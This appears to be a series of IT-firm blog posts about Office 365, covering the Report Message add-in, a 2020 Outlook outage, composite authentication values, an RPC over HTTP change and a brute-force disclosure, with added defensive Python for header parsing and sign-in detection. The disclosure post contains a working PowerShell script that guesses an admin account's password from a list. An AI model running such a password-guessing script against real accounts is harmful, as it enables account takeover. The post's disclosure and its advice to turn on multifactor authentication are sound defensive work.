The Report Message add-in for Outlook and Outlook on the web enables people to easily report misclassified email, whether safe or malicious, to Microsoft and its affiliates for analysis. Microsoft uses these submissions to improve the effectiveness of email protection technologies.
People who have the add-in assigned to them will see the following icons:
In Outlook, the icon looks like this:
In Outlook on the web, the icon looks like this:
If you have a junk or phishing message in your inbox, please click this icon and report it accordingly. Junk/spam is unwanted email, usually an advertisement (Nutrisystem, unwanted newsletters, etc.). Phishing emails are generally emails with links that prompt you to enter your password or respond in a way that reveals personal information.
If you choose Junk, Phishing, or Not Junk, you’ll have the option to send a copy of the message to Microsoft, along with your classification of the message. Please send a copy to Microsoft, as this helps improve their database and protects your company and others from similar spam/phishing. If you are unsure of the best category, we suggest marking it as junk. The most important thing is submitting it to the Microsoft database; they can organize it how they see fit on their end.
Update: This issue has been resolved and it is now safe to restart Outlook.
Microsoft Outlook on Windows is crashing worldwide due to an issue on Office 365’s servers. If you close Outlook and you are on the most recent version, Outlook will probably not re-open. Please refrain from restarting Outlook. This issue is not reported as affecting Outlook on mobile or web. If your Outlook is not working, please call our office at 859-226-9222 and we can apply a workaround, or use webmail (https://mail.office365.com) until the issue is resolved at Office 365.
We will update this page when the issue is resolved.
Ongoing Updates
7/16/2020 @ 8:55AM EST – Issue has been resolved per Microsoft. “We’ve confirmed that the issue has been successfully resolved after extended monitoring of our telemetry. If users are continuing to see impact, please restart your Outlook client for the changes to take effect.” – Microsoft
7/15/2020 @ 6:15PM EST – Most users are not experiencing this issue anymore. We suggest not restarting Outlook until this issue is completely resolved. Per Microsoft: “Our service telemetry indicates that the vast majority of customers have received our fix; however, we’re still observing some signs of lingering impact to a subset of users. Users that are still impacted may need to restart their Outlook client for the fix to take effect.”
7/15/2020 @ 3:03PM EST – Microsoft is working to fix the issue. The issue is still present. Please refrain from restarting Outlook.
7/15/2020 @ 1:45PM EST – Microsoft is working to fix the issue. The issue is still present. Please refrain from restarting Outlook.
This then made me wonder about composite authentication and what a softpass is.
While SPF, DKIM, and DMARC are all useful by themselves, they don’t communicate enough authentication status in the event a message has no explicit authentication records. Therefore, Microsoft has developed an algorithm that combines multiple signals into a single value called Composite Authentication, or compauth for short. Customers in Office 365 have compauth values stamped into the Authentication-Results header in the message headers.
fail: Message failed explicit authentication (sending domain published records explicitly in DNS) or implicit authentication (sending domain did not publish records in DNS, so Office 365 interpolated the result as if it had published records).
pass: Message passed explicit authentication (message passed DMARC, or Best Guess Passed DMARC) or implicit authentication with high confidence (sending domain does not publish email authentication records, but Office 365 has strong backend signals to indicate the message is likely legitimate).
softpass: Message passed implicit authentication with low-to-medium confidence (sending domain does not publish email authentication records, but Office 365 has backend signals to indicate the message is legitimate, although the strength of the signal is weaker).
none: Message did not authenticate (or it did authenticate but did not align), but composite authentication was not applied due to sender reputation or other factors.
So essentially, a softpass is when there are no DMARC records, but Office 365 is pretty sure that this domain is the appropriate sender. A pass is when either a DMARC record is published and it passes, or Microsoft is very sure the email is legitimate.
By default, softpass is not marked as junk. I think this is a pretty good setting, since not a lot of domains have DMARC set up.
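An added example, not from the original post or from Microsoft, that parses the Authentication-Results header Office 365 stamps and reads out the compauth verdict next to the explicit DMARC result, so you can tell an explicit pass from an implicit one. The header values, domains, IPs and reason codes are constructed for illustration.

```python
import re
from typing import Dict

# Constructed sample Authentication-Results values in the Office 365 layout;
# the domains, IPs and reason codes are made up, not captured from a tenant.
SAMPLES = {
    "explicit_pass": (
        "Authentication-Results: spf=pass (sender IP is 203.0.113.10) smtp.mailfrom=example.com; "
        "dkim=pass (signature was verified) header.d=example.com; "
        "dmarc=pass action=none header.from=example.com; compauth=pass reason=100"
    ),
    "implicit_softpass": (
        "spf=pass (sender IP is 203.0.113.20) smtp.mailfrom=example.net; "
        "dkim=none (message not signed) header.d=none; "
        "dmarc=none action=none header.from=example.net; compauth=softpass reason=202"
    ),
    "fail": (
        "spf=fail (sender IP is 198.51.100.5) smtp.mailfrom=example.org; "
        "dkim=none (message not signed) header.d=none; "
        "dmarc=fail action=oreject header.from=example.org; compauth=fail reason=000"
    ),
}

def parse_auth_results(header: str) -> Dict[str, Dict[str, str]]:
    """Split an Authentication-Results value into {method: {"result": ..., prop: value}}."""
    body = re.sub(r"^Authentication-Results:\s*", "", header.strip(), flags=re.I)
    parsed: Dict[str, Dict[str, str]] = {}
    for clause in body.split(";"):
        clause = re.sub(r"\([^)]*\)", "", clause).strip()  # drop "(...)" comments
        if not clause:
            continue
        tokens = clause.split()
        method, _, result = tokens[0].partition("=")
        props = {k: v for k, _, v in (t.partition("=") for t in tokens[1:]) if k}
        parsed[method.lower()] = {"result": result.lower(), **props}
    return parsed

def summarize(header: str) -> Dict[str, str]:
    """Report the compauth verdict and whether it came from explicit (DMARC) or implicit checks."""
    r = parse_auth_results(header)
    compauth = r.get("compauth", {}).get("result", "none")
    dmarc = r.get("dmarc", {}).get("result", "none")
    # dmarc=none means the sending domain published no DMARC record, so a
    # pass/softpass/fail stamped by Office 365 came from implicit authentication.
    mode = "implicit" if dmarc == "none" else "explicit"
    return {"compauth": compauth, "dmarc": dmarc, "mode": mode,
            "reason": r.get("compauth", {}).get("reason", "")}
```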
Putting this together real quick. Hoping to get some publicity on it because I think it is a major vulnerability.
Today we were auditing a client’s security and discovered that Office 365 will let you brute force them, all day long. Seemingly without restriction.
I notified an Office 365 representative that this was an issue, and their solution was to enable two factor authentication. However, this doesn’t apply to a lot of admin accounts that exist on Office 365.
The process an attacker would use would be to figure out who the IT director is of a major company, put their email address in this script and test against a password list.
# Login to O365
Import-Module MSOnline
# Account you wish to brute force
$username = "admin@microsoft.com"
# Attempt logins using every password in your password list
$x = 0
foreach ($password in Get-Content password_list.txt) {
    $x = $x + 1
    Write-Host "Attempt #$x"
    Write-Host "Trying password $password"
    $password = $password | ConvertTo-SecureString -AsPlainText -Force
    $O365Cred = New-Object System.Management.Automation.PSCredential($username, $password)
    $O365Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $O365Cred -Authentication Basic -AllowRedirection
    Connect-MsolService -Credential $O365Cred
    # Check a command. If the command has output that means your password is good.
    $Domains = Get-MsolDomain
    if ($Domains) { exit }
}
It seems Office 365 is not restricting bad login attempts. I’ve been attempting to log in for over 3 hours now and have passed 1000+ passwords. I’ve heard that they will reduce the speed at which you can log in, but that doesn’t seem to be the case based on my data.
Azure Active Directory shows sign-in failures
…and even says that “Account is locked because user tried to sign in too many times with an incorrect user ID or password.” which is not true since I can still log in with that account.
Multifactor authentication does prevent this. When the password is guessed correctly I get a login box which forces 2FA on me. This tells me the password is right; I just need to get access to the user’s device, which is much harder from a distance.
Moral of this story: turn on 2FA for your Office 365 admin accounts. Microsoft, can you please do something about this?
Update: Microsoft does have an article with details on how to secure the global admin accounts. One of the best ways is to use a separate account with the username generated by a random password generator + random password + multifactor authentication. https://support.office.com/en-us/article/protect-your-office-365-global-administrator-accounts-6b4ded77-ac8d-42ed-8606-c014fd947560
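An added example, not from the original post, of the defender-side check for what the post describes: given sign-in records with the user, source IP and status fields that the Azure AD sign-in report shows, it flags a run of failures against one account and, separately, a success that follows such a run (the signal that a guess landed). The records are constructed, and the window and threshold are assumptions to tune per tenant.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

# Constructed sign-in records (not from a real tenant). The fields mirror the
# user, source IP and status columns the Azure AD sign-in report shows.
def constructed_signins() -> List[Dict]:
    base = datetime(2020, 7, 15, 13, 0, 0)
    rows = []
    for i in range(25):  # one admin account hit with a rapid run of wrong passwords
        rows.append({"time": base + timedelta(seconds=3 * i), "user": "admin@example.com",
                     "ip": "198.51.100.7", "status": "failure"})
    rows.append({"time": base + timedelta(seconds=80), "user": "admin@example.com",
                 "ip": "198.51.100.7", "status": "success"})  # ...and then a success
    for i in range(2):  # an ordinary user mistyping a password twice: no alert
        rows.append({"time": base + timedelta(minutes=5, seconds=i), "user": "alice@example.com",
                     "ip": "203.0.113.9", "status": "failure"})
    return rows

def _alert(kind: str, user: str, q: Deque[Tuple[datetime, str]]) -> Dict:
    return {"kind": kind, "user": user, "failures": len(q),
            "sources": sorted({ip for _, ip in q}),
            "first": q[0][0].isoformat(), "last": q[-1][0].isoformat()}

def detect_guessing(rows: List[Dict], window: timedelta = timedelta(minutes=10),
                    threshold: int = 10) -> List[Dict]:
    """Sliding-window check: alert once when a user reaches `threshold` failures
    inside `window`, and again if a success arrives while that burst is still in the window."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerts: List[Dict] = []
    for r in sorted(rows, key=lambda row: row["time"]):
        q = recent[r["user"]]
        while q and r["time"] - q[0][0] > window:  # expire failures outside the window
            q.popleft()
        if r["status"] == "failure":
            q.append((r["time"], r["ip"]))
            if len(q) == threshold:  # fire once per burst, not on every further failure
                alerts.append(_alert("failure_burst", r["user"], q))
        elif r["status"] == "success" and len(q) >= threshold:
            alerts.append(_alert("success_after_burst", r["user"], q))
            q.clear()
    return alerts
```

The per-user window also catches guessing spread over several source IPs, since the alert lists every IP seen in the burst.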
Microsoft has recently changed the text on their RPC over HTTP End-Of-Life page, which originally claimed it would not allow Outlook 2007 to connect to Office 365. The updated text now reads:
RPC over HTTP, also known as Outlook Anywhere, is a legacy method of connectivity and transport between Outlook for Windows and Exchange. In May 2014, Microsoft introduced MAPI over HTTP as a replacement for RPC over HTTP.
Starting on October 31, 2017, RPC over HTTP will no longer be a supported protocol for accessing mail data from Exchange Online. Starting on this date, the following conditions will apply:
Microsoft will not provide support for RPC over HTTP issues (regular or custom).
No code fixes or updates to resolve problems that are unrelated to security will be released.
Additionally, for Office versions that support MAPI over HTTP, Microsoft may elect to override existing registry keys that customers are using in order to force RPC over HTTP use.
Keyword here: support. This essentially means that nothing will happen to users of Outlook 2007 and Office 365, but Microsoft will no longer support the protocol (i.e. they won’t support Outlook 2007 connections).
It is still a good idea to move users away from Outlook 2007. We feel any calls to Office 365 with Outlook 2007 running will be met with resistance from the support staff. Additionally, Microsoft may change their stance on this in the future.
CSSI provides businesses with IT services including Office 365 support and migrations. Contact CSSI for more information on how you can improve your Office 365 infrastructure!